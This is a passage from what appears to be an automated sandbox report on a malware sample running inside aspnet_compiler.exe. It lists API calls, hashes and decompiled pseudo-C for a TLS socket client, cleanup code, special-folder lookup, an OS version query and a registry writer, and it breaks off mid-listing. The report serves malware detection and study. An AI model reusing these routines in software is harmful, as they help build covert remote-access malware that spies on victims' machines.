                0x0041477b
                0x00414798
                0x004147ac
                0x004147cf
                0x004147e1
                0x004147f1
                0x00414801
                0x00414821
                0x00414834
                0x00414846
                0x00414aab
                0x00414aaf
                0x00414ab5
                0x00414aba
                0x00414abe
                0x00414ac9
                0x00414ad4
                0x00414adf
                0x00414aea
                0x00414af5
                0x00414b00
                0x00414b0b
                0x00414b16
                0x00414b21
                0x00414b2c
                0x00414b37
                0x00414b42
                0x00414b4d
                0x00414b58
                0x00414b63
                0x00414b6e
                0x00414b79
                0x00414b84
                0x00414b8f
                0x00414b9a
                0x00414ba5
                0x00414bb0
                0x00414bbb
                0x00414bc6
                0x00414bd1
                0x00414bdc
                0x00414be7
                0x00414bf2
                0x00414bfd
                0x00414c08
                0x00414c13
                0x00414c1e
                0x00414c29
                0x00414c34
                0x00414c3f
                0x00414c4a
                0x00414c55
                0x00414c60
                0x00414c6b
                0x00414c76
                0x00414c81
                0x00414c8c
                0x00414c97
                0x00414ca2
                0x00414cad
                0x00414cb8
                0x00414cc3
                0x00414cce
                0x00414cd9
                0x00414ce4
                0x00414cef
                0x00414cfa
                0x00414d05
                0x00414d10
                0x00414d1b
                0x00414d26
                0x00414d2e
                0x00414d3c
                0x00414d41
                0x00414d46
                0x00414d48
                0x00414d4a
                0x00414d51
                0x00414d53
                0x00414d55
                0x00414d55
                0x00414d51
                0x00414d5c
                0x00414d63
                0x00414d6a
                0x00414d6a
                0x00414d6f
                0x00414d74
                0x00414d7e
                0x00414d83
                0x00414d8d
                0x00414d92
                0x00414d97
                0x00414d9a
                0x00414da1
                0x00414da3
                0x00414daf
                0x00414daf
                0x00414db8
                0x00414dc3
                0x00414dcb
                0x00414dd0
                0x00414dd0
                0x0041452c
                0x0041452c
                0x00414536
                0x0041453b
                0x00414545
                0x0041454a
                0x0041454f
                0x0041454f
                0x004144d3
                0x004144d3
                0x004144de
                0x004144e3
                0x004144e6
                0x004144ee
                0x004144f3
                0x004144fd
                0x00414502
                0x00414507
                0x0041450d
                0x00414512
                0x00414512
                0x00414dd7
                0x00414ddf
                0x00414de0
                0x00414de5
                0x00414de7
                0x00414ded
                0x00414e01
                0x00414e01
                0x00414e09
                0x00414e09
                0x00414e12
                0x00000000

                APIs
                • Sleep.KERNEL32(00000000,00000029,00473238,00473298,00000000), ref: 004142C2
                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004144D3
                • Sleep.KERNELBASE(00000000,00000002), ref: 00414E09
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Sleep$ErrorLastLocalTime
                • String ID: 2G$ | $%I64u$4.6.0 Pro$82G$@-G$@0G$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name$4G$4G$4G$Cqt
                • API String ID: 524882891-3434259954
                • Opcode ID: cda3c33907060bd797f23cb1446595010d75ab10fdd55e45392da1c90188f4b9
                • Instruction ID: ab0e32b11b9d89d3eba901e54de1f942eff96493c18d1503d8c82c51ace3a389
                • Opcode Fuzzy Hash: cda3c33907060bd797f23cb1446595010d75ab10fdd55e45392da1c90188f4b9
                • Instruction Fuzzy Hash: 52529D31A001155BCB18F761DD96AEEB3699F90308F1041BFF40A761E2EF785F868A9D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004048A8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 72%
                			E004048A8(void* __ecx, void* __esi) {
				char _v32;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr _t21;
				int _t22;
				void* _t26;
				signed int _t31;
				void* _t32;
				void* _t33;
				struct _SECURITY_ATTRIBUTES* _t34;
				void* _t43;
				void* _t51;
				struct _SECURITY_ATTRIBUTES* _t56;
				void* _t58;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t103;
				void* _t104;

				_t84 = __esi;
				_t21 =  *0x470adc; // 0x140f348
				_t87 = _t86 - 0x1c;
				_t82 = __ecx;
				__imp__#4( *((intOrPtr*)(__ecx + 4)),  *((intOrPtr*)(_t21 + 0x18)),  *((intOrPtr*)(_t21 + 0x10)), _t81, _t51); // executed
				if(_t21 != 0) {
					__eflags =  *((char*)(__ecx + 0x31));
					if( *((char*)(__ecx + 0x31)) != 0) {
						__imp__#111();
						_t56 = _t21 - 0x2736;
						__eflags = _t56;
						if(_t56 != 0) {
							__eflags = _t56 == 0x17;
							if(_t56 == 0x17) {
								_t88 = _t87 - 0x18;
								_t58 = _t87 - 0x18;
								_push("Connection Refused");
								goto L20;
							} else {
								_t26 = E0041B45A( &_v32, _t21);
								_t91 = _t87 - 0x18;
								E004052DD(_t51, _t87 - 0x18, "Connection Failed: ", _t85, __eflags, _t26);
								E00402073(_t51, _t91 - 0x14, "Connection Failed: ", _t85, "E");
								E0041A04A(_t51, _t82);
								E00401FB8();
							}
						}
					}
					goto L21;
				} else {
					if( *((intOrPtr*)(__ecx + 1)) == _t21) {
						L14:
						_t22 = 1;
					} else {
						if( *((intOrPtr*)(__ecx + 0x31)) != _t21) {
							_t103 = _t87 - 0x18;
							_t6 = _t82 + 0x34; // 0x472f14
							_t77 = "TLS Handshake...      | ";
							E004052FE(_t103, "TLS Handshake...      | ", _t85, _t6);
							_t104 = _t103 - 0x14;
							E00402073(_t51, _t104, "TLS Handshake...      | ", _t85, "i");
							E0041A04A(_t51, _t82);
							_t87 = _t104 + 0x30;
						}
						_t31 = E0041F56B(_t51);
						 *(_t82 + 0x4c) = _t31;
						if(_t31 != 0) {
							_t80 =  *((intOrPtr*)(_t82 + 4));
							_t32 = E0041F79A(_t31,  *((intOrPtr*)(_t82 + 4)));
							__eflags = _t32 - 1;
							if(_t32 == 1) {
								_t33 = E0042034B();
								__eflags = _t33 - 1;
								if(_t33 == 1) {
									_t34 = E0041F711(_t51);
									 *((intOrPtr*)(_t82 + 0x50)) = _t34;
									__eflags = _t34;
									if(_t34 == 0) {
										_t94 = _t87 - 0x18;
										E00402073(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 3");
										E00402073(_t51, _t94 - 0x18, _t80, _t85, "E");
										E0041A04A(_t51, _t82);
									}
									__eflags = 0;
									 *((intOrPtr*)(_t82 + 0x70)) = CreateEventW(0, 0, 1, 0);
									 *((intOrPtr*)(_t82 + 0x6c)) = CreateEventW(0, 0, 1, 0);
									goto L14;
								} else {
									_t97 = _t87 - 0x18;
									E00402073(_t51, _t87 - 0x18, _t80, _t85, "TLS Authentication Failed");
									E00402073(_t51, _t97 - 0x18, _t80, _t85, "E");
									_t43 = E0041F9BD(E0041A04A(_t51, _t82),  *(_t82 + 0x4c));
									goto L8;
								}
							} else {
								_t100 = _t87 - 0x18;
								E00402073(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 2");
								E00402073(_t51, _t100 - 0x18, _t80, _t85, "E");
								_t43 = E0041A04A(_t51, _t82);
								L8:
								E0041F5AB(_t43, _t51,  *(_t82 + 0x4c), _t80, _t82, _t84);
								 *(_t82 + 0x4c) =  *(_t82 + 0x4c) & 0x00000000;
								goto L21;
							}
						} else {
							_t88 = _t87 - 0x18;
							_t58 = _t87 - 0x18;
							_push("TLS Error 1");
							L20:
							E00402073(_t51, _t58, _t77, _t85);
							E00402073(_t51, _t88 - 0x18, _t77, _t85, "E");
							E0041A04A(_t51, _t82);
							L21:
							_t22 = 0;
						}
					}
				}
				return _t22;
			}


























                0x004048a8
                0x004048ab
                0x004048b0
                0x004048b8
                0x004048c0
                0x004048c8
                0x004049fb
                0x004049ff
                0x00404a01
                0x00404a09
                0x00404a09
                0x00404a0f
                0x00404a11
                0x00404a14
                0x00404a51
                0x00404a54
                0x00404a56
                0x00000000
                0x00404a16
                0x00404a1b
                0x00404a20
                0x00404a2b
                0x00404a3a
                0x00404a3f
                0x00404a4a
                0x00404a4a
                0x00404a14
                0x00404a0f
                0x00000000
                0x004048ce
                0x004048d1
                0x004049f7
                0x004049f7
                0x004048d7
                0x004048da
                0x004048dc
                0x004048df
                0x004048e4
                0x004048ea
                0x004048ef
                0x004048f9
                0x004048fe
                0x00404903
                0x00404903
                0x00404906
                0x0040490b
                0x00404910
                0x00404921
                0x00404926
                0x0040492b
                0x0040492e
                0x0040496a
                0x0040496f
                0x00404972
                0x004049a7
                0x004049ac
                0x004049af
                0x004049b1
                0x004049b3
                0x004049bd
                0x004049cc
                0x004049d1
                0x004049d6
                0x004049d9
                0x004049eb
                0x004049f4
                0x00000000
                0x00404974
                0x00404974
                0x0040497e
                0x0040498d
                0x0040499d
                0x00000000
                0x0040499d
                0x00404930
                0x00404930
                0x0040493a
                0x00404949
                0x0040494e
                0x00404956
                0x00404959
                0x0040495e
                0x00000000
                0x0040495e
                0x00404912
                0x00404912
                0x00404915
                0x00404917
                0x00404a5b
                0x00404a5b
                0x00404a6a
                0x00404a6f
                0x00404a77
                0x00404a77
                0x00404a77
                0x00404910
                0x004048d1
                0x00404a7e

                APIs
                • connect.WS2_32(?,?,?), ref: 004048C0
                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                • WSAGetLastError.WS2_32 ref: 00404A01
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                • API String ID: 994465650-2151626615
                • Opcode ID: 13303b7777a66e0627b8120b2b748ce865bb03d248de62a457749d618faae74e
                • Instruction ID: 4dac077a67aca900205559ee8606d27a3048533bf49cbaad300c4d8012786ffc
                • Opcode Fuzzy Hash: 13303b7777a66e0627b8120b2b748ce865bb03d248de62a457749d618faae74e
                • Instruction Fuzzy Hash: 5641C5B1F4020177D6047B7A890B96E7A25AB81304B50017FF901226D3EE7DA96587EF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404E06 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 92%
                			E00404E06(void* __edx) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t29;
				int _t32;
				void* _t44;
				void* _t48;
				void* _t50;
				void* _t51;

				_t48 = __edx;
				_t51 = WaitForSingleObject;
				_t50 = _t44;
				_t29 = WaitForSingleObject( *(_t50 + 0x68), 0xffffffff);
				if( *(_t50 + 4) != 0xffffffff) {
					__imp__#3( *(_t50 + 4));
					if(_t29 == 0) {
						 *(_t50 + 4) =  *(_t50 + 4) | 0xffffffff;
					}
					_t45 = _t50;
					if(E004046D3(_t50) != 0) {
						E004050C4(_t45, _t51, 1);
					}
					if( *((char*)(_t50 + 1)) != 0) {
						E0041F5AB(WaitForSingleObject( *(_t50 + 0x70), 0xffffffff), CloseHandle,  *(_t50 + 0x50), _t48, SetEvent, _t50);
						 *(_t50 + 0x50) =  *(_t50 + 0x50) & 0x00000000;
						SetEvent( *(_t50 + 0x70));
						E0041F5AB(WaitForSingleObject( *(_t50 + 0x6c), 0xffffffff), CloseHandle,  *(_t50 + 0x4c), _t48, SetEvent, _t50);
						 *(_t50 + 0x4c) =  *(_t50 + 0x4c) & 0x00000000;
						SetEvent( *(_t50 + 0x6c));
						FindCloseChangeNotification( *(_t50 + 0x70)); // executed
						FindCloseChangeNotification( *(_t50 + 0x6c)); // executed
						 *(_t50 + 0x70) =  *(_t50 + 0x70) & 0x00000000;
						 *(_t50 + 0x6c) =  *(_t50 + 0x6c) & 0x00000000;
					}
					SetEvent( *(_t50 + 0x68));
					_t32 = CloseHandle( *(_t50 + 0x68));
				} else {
					SetEvent( *(_t50 + 0x68));
					_t32 = CloseHandle( *(_t50 + 0x68));
				}
				 *(_t50 + 0x68) =  *(_t50 + 0x68) & 0x00000000;
				return _t32;
			}














                0x00404e06
                0x00404e09
                0x00404e11
                0x00404e18
                0x00404e1e
                0x00404e3a
                0x00404e42
                0x00404e44
                0x00404e44
                0x00404e48
                0x00404e51
                0x00404e55
                0x00404e55
                0x00404e6a
                0x00404e76
                0x00404e7e
                0x00404e82
                0x00404e8e
                0x00404e96
                0x00404e9a
                0x00404e9f
                0x00404ea4
                0x00404ea6
                0x00404eaa
                0x00404eaa
                0x00404eb1
                0x00404eb6
                0x00404e20
                0x00404e23
                0x00404e2c
                0x00404e2c
                0x00404eb8
                0x00404ec1

                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                • closesocket.WS2_32(000000FF), ref: 00404E3A
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E71
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404E82
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E89
                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9A
                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9F
                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EA4
                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB1
                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB6
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseEvent$ObjectSingleWait$ChangeFindHandleNotification$closesocket
                • String ID:
                • API String ID: 4074944092-0
                • Opcode ID: c35fc44e5bfacc15a099201c4a6197d0eccb1db68525e6f951916da880a66cf1
                • Instruction ID: 36cdbf8d69702b382ce25e6a3e5e0fa9723ae9905729ab2d5c1a42a88e4aa4cf
                • Opcode Fuzzy Hash: c35fc44e5bfacc15a099201c4a6197d0eccb1db68525e6f951916da880a66cf1
                • Instruction Fuzzy Hash: D6211A71044B00AFD7216B26DC49A1BBBA6FF40326F104A3DE1A611AF1CB75A851DB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040CF38 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1016 40cf38-40cf5d call 401f66 1019 40cf63 1016->1019 1020 40d087-40d0ad call 401ee4 GetLongPathNameW call 40415e 1016->1020 1021 40d072 1019->1021 1022 40d063-40d068 call 43a99f 1019->1022 1023 40cf74-40cf82 call 41a10f call 401ef3 1019->1023 1024 40cf95-40cf9a 1019->1024 1025 40d055-40d05a 1019->1025 1026 40cfa9-40cfb0 call 41ab12 1019->1026 1027 40cf6a-40cf6f 1019->1027 1028 40d05c-40d061 1019->1028 1029 40cf9f-40cfa4 1019->1029 1041 40d0b2-40d11f call 40415e call 40d2d5 call 402f85 * 2 call 401ee9 * 5 1020->1041 1031 40d077-40d07c call 43a99f 1021->1031 1038 40d06d-40d070 1022->1038 1050 40cf87 1023->1050 1024->1031 1025->1031 1042 40cfb2-40d002 call 40415e call 43a99f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1026->1042 1043 40d004-40d050 call 40415e call 43a99f call 40415e call 402f85 call 401ef3 call 401ee9 * 2 1026->1043 1027->1031 1028->1031 1029->1031 1044 40d07d-40d082 call 4086cb 1031->1044 1038->1021 1038->1044 1055 40cf8b-40cf90 call 401ee9 1042->1055 1043->1050 1044->1020 1050->1055 1055->1020
                C-Code - Quality: 86%
                			E0040CF38(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				void* __ebp;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;
				void* _t82;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
				E00401F66(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t86 = _t36 - 8;
				if(_t36 <= 8) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M0040D120))) {
						case 0:
							_push(L"Temp");
							goto L15;
						case 1:
							__ecx =  &_v620;
							__eax = E0041A10F(__ebx,  &_v620, __edx);
							__ecx =  &_v644;
							__eax = E00401EF3( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L15;
						case 3:
							_push(L"WinDir");
							goto L15;
						case 4:
							__eax = E0041AB12(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E0040415E(__ebx, __ecx, __edx, __ebp, L"\\SysWOW64") = E0043A99F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = E00402F85( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = E00401EF3( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = E00401EE9();
								__ecx =  &_v608;
								__eax = E00401EE9();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E0040415E(__ebx, __ecx, __edx, __ebp, L"\\system32") = E0043A99F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = E00402F85( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = E00401EF3( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = E00401EE9();
								__ecx =  &_v608;
								__eax = E00401EE9();
								__ecx =  &_v584;
								L5:
								__eax = E00401EE9();
								goto L17;
							}
							L18:
						case 5:
							L14:
							_push(L"ProgramFiles");
							goto L15;
						case 6:
							_push(L"AppData");
							goto L15;
						case 7:
							_push(L"UserProfile");
							L15:
							_t51 = E0043A99F(_t54, _t57, _t86);
							goto L16;
						case 8:
							__eax = E0043A99F(__ebx, __ecx, __eflags, L"ProgramData"); // executed
							__eflags = __eax;
							if(__eflags == 0) {
								goto L14;
							}
							L16:
							L004086CB(_t54,  &_v644, _t73, _t51);
							goto L17;
					}
				}
				L17:
				__imp__GetLongPathNameW(E00401EE4( &_v644),  &_v524, 0x208); // executed
				_t39 = E0040415E(_t54,  &_v560, _t73, _t82, _a4);
				_t40 = E0040415E(_t54,  &_v636, _t73, _t82, "\\");
				E00402F85(_t77, E00402F85( &_v600, E0040D2D5(_t54,  &_v616, _t73, _t82, _t86,  &_v544, _t38), _t40), _t39);
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				return _t77;
				goto L18;
			}





























                0x0040cf38
                0x0040cf47
                0x0040cf49
                0x0040cf4f
                0x0040cf57
                0x0040cf5a
                0x0040cf5d
                0x0040cf63
                0x00000000
                0x0040cf6a
                0x00000000
                0x00000000
                0x0040cf74
                0x0040cf78
                0x0040cf7e
                0x0040cf82
                0x00000000
                0x00000000
                0x0040cf95
                0x00000000
                0x00000000
                0x0040cf9f
                0x00000000
                0x00000000
                0x0040cfa9
                0x0040cfae
                0x0040cfb0
                0x0040d009
                0x0040d018
                0x0040d01f
                0x0040d028
                0x0040d02a
                0x0040d02e
                0x0040d035
                0x0040d039
                0x0040d03e
                0x0040d042
                0x0040d047
                0x0040d04b
                0x0040cf87
                0x0040cf87
                0x00000000
                0x0040cfb2
                0x0040cfb7
                0x0040cfc6
                0x0040cfcd
                0x0040cfd6
                0x0040cfd8
                0x0040cfdc
                0x0040cfe3
                0x0040cfe7
                0x0040cfec
                0x0040cff0
                0x0040cff5
                0x0040cff9
                0x0040cffe
                0x0040cf8b
                0x0040cf8b
                0x00000000
                0x0040cf8b
                0x00000000
                0x00000000
                0x0040d072
                0x0040d072
                0x00000000
                0x00000000
                0x0040d055
                0x00000000
                0x00000000
                0x0040d05c
                0x0040d077
                0x0040d077
                0x00000000
                0x00000000
                0x0040d068
                0x0040d06e
                0x0040d070
                0x00000000
                0x00000000
                0x0040d07d
                0x0040d082
                0x00000000
                0x00000000
                0x0040cf63
                0x0040d087
                0x0040d09e
                0x0040d0ad
                0x0040d0bc
                0x0040d0e4
                0x0040d0ee
                0x0040d0f7
                0x0040d100
                0x0040d109
                0x0040d112
                0x0040d11f
                0x00000000

                APIs
                • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040D09E
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: LongNamePath
                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                • API String ID: 82841172-425784914
                • Opcode ID: 416c82e29f2a5aaddd2cac1b05b639a7fd3b3722419c04575c1af6e40ff1a376
                • Instruction ID: 6b614a152261b5ac042ce2f1e9ed8ca0f13a8186c1863ac34b2aa9a3c23cc976
                • Opcode Fuzzy Hash: 416c82e29f2a5aaddd2cac1b05b639a7fd3b3722419c04575c1af6e40ff1a376
                • Instruction Fuzzy Hash: A24155715082009AC204F761D852DAFB3E8AE9075CF10053FF586760E2EE789A4AC65F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00419E1E Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 61COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1145 419e1e-419e75 call 41ab12 call 41288e call 401fc2 call 401fb8 call 406155 1156 419e77-419e86 call 41288e 1145->1156 1157 419eb8-419ec1 1145->1157 1162 419e8b-419ea2 call 401f8b StrToIntA 1156->1162 1158 419ec3-419ec8 1157->1158 1159 419eca 1157->1159 1161 419ecf-419eda call 40535d 1158->1161 1159->1161 1167 419eb0-419eb3 call 401fb8 1162->1167 1168 419ea4-419ead call 41b874 1162->1168 1167->1157 1168->1167
                C-Code - Quality: 74%
                			E00419E1E(void* __ecx, void* __eflags) {
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t7;
				void* _t8;
				int _t15;
				void* _t25;
				void* _t31;
				void* _t32;
				void* _t33;

				_t7 = E0041AB12(__ecx);
				_push(__ecx);
				_t19 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";
				 *0x472ae4 = _t7;
				_t29 = 0x80000002;
				_t8 = E0041288E( &_v28, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
				E00401FC2(0x473950, 0x80000002, _t31, _t8);
				E00401FB8();
				_t32 = E00406155(0x473950, "10", 0);
				if(_t32 != 0xffffffff) {
					_push(0x473950);
					_t29 = 0x80000002;
					E0041288E( &_v28, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "CurrentBuildNumber"); // executed
					_t15 = StrToIntA(E00401F8B( &_v28));
					_t39 = _t15 - 0x55f0;
					if(_t15 >= 0x55f0) {
						_t5 = _t32 + 1; // 0x1
						 *((char*)(E0041B874(0x80000002, _t33, _t39, _t5))) = 0x31;
					}
					E00401FB8();
				}
				_t25 = 0x473950;
				if( *0x472ae4 == 0) {
					_push(" (32 bit)");
				} else {
					_push(" (64 bit)");
				}
				return L0040535D(_t19, _t25, _t29, 0x473950, _t33);
			}















                0x00419e27
                0x00419e2c
                0x00419e32
                0x00419e37
                0x00419e3d
                0x00419e45
                0x00419e55
                0x00419e5d
                0x00419e70
                0x00419e75
                0x00419e77
                0x00419e7e
                0x00419e86
                0x00419e97
                0x00419e9d
                0x00419ea2
                0x00419ea4
                0x00419ead
                0x00419ead
                0x00419eb3
                0x00419eb3
                0x00419ebf
                0x00419ec1
                0x00419eca
                0x00419ec3
                0x00419ec3
                0x00419ec3
                0x00419eda

                APIs
                  • Part of subcall function 0041AB12: GetCurrentProcess.KERNEL32(?,?,?,0040CFAE,WinDir,00000000,00000000), ref: 0041AB23
                  • Part of subcall function 0041288E: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004128B2
                  • Part of subcall function 0041288E: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004128CF
                  • Part of subcall function 0041288E: RegCloseKey.KERNELBASE(?), ref: 004128DA
                • StrToIntA.SHLWAPI(00000000,0046A9AC,00000000,00000000,00000000,00473298,00000003,Exe,00000000,0000000E,00000000,0046408C,00000003,00000000), ref: 00419E97
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCurrentOpenProcessQueryValue
                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$P9G$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                • API String ID: 1866151309-2787534724
                • Opcode ID: 84b1c4753be20ea6fcc25a739c086d543e31789d1c034ba7582dc327abde189c
                • Instruction ID: 2d8a69e0546d05ecafa38ff55f4d44f4812dfb7c18b39c611b81bdfdf30cbcec
                • Opcode Fuzzy Hash: 84b1c4753be20ea6fcc25a739c086d543e31789d1c034ba7582dc327abde189c
                • Instruction Fuzzy Hash: C311E370A4020116C704B3659C5BEEF7A1D8790305F64053FF906B61D2EB7C1C9686AF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00412A57 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1190 412a57-412a6e RegCreateKeyA 1191 412a70-412aa5 call 40245c call 401f8b RegSetValueExA RegCloseKey 1190->1191 1192 412aa7 1190->1192 1194 412aa9-412ab7 call 401fb8 1191->1194 1192->1194
                C-Code - Quality: 77%
                			E00412A57(void* __ecx, char* __edx, char* _a4, char _a8, int _a32) {
				void* _v8;
				long _t12;
				int _t15;
				long _t17;
				signed int _t19;
				signed int _t20;

				_push(__ecx);
				_push(_t19);
				_t12 = RegCreateKeyA(0x80000001, __edx,  &_v8); // executed
				if(_t12 != 0) {
					_t20 = 0;
				} else {
					_t15 = E0040245C();
					_t17 = RegSetValueExA(_v8, _a4, 0, _a32, E00401F8B( &_a8), _t15); // executed
					RegCloseKey(_v8); // executed
					_t20 = _t19 & 0xffffff00 | _t17 == 0x00000000;
				}
				E00401FB8();
				return _t20;
			}









                0x00412a5a
                0x00412a5b
                0x00412a66
                0x00412a6e
                0x00412aa7
                0x00412a70
                0x00412a74
                0x00412a8e
                0x00412a99
                0x00412aa2
                0x00412aa2
                0x00412aac
                0x00412ab7

                APIs
                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412A66
                • RegSetValueExA.KERNELBASE(?,00465480,00000000,?,00000000,00000000,00473238,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A8E
                • RegCloseKey.KERNELBASE(?,?,?,0040ED96,00465480,4.6.0 Pro), ref: 00412A99
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateValue
                • String ID: pth_unenc
                • API String ID: 1818849710-4028850238
                • Opcode ID: 94021dc1c1d03cfd80497e16010bebe54771d725e16ad2690a32dfc7f40571c1
                • Instruction ID: 065d1f4c68480eb08966ef6070b87cad1f8bbd79d217faba3f808efe567dd641
                • Opcode Fuzzy Hash: 94021dc1c1d03cfd80497e16010bebe54771d725e16ad2690a32dfc7f40571c1
                • Instruction Fuzzy Hash: 99F0F632140208BFCB00AFA0ED45DEE376CEF04750F104276BD09A61A2D7359E10DB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00412B5F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30registryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
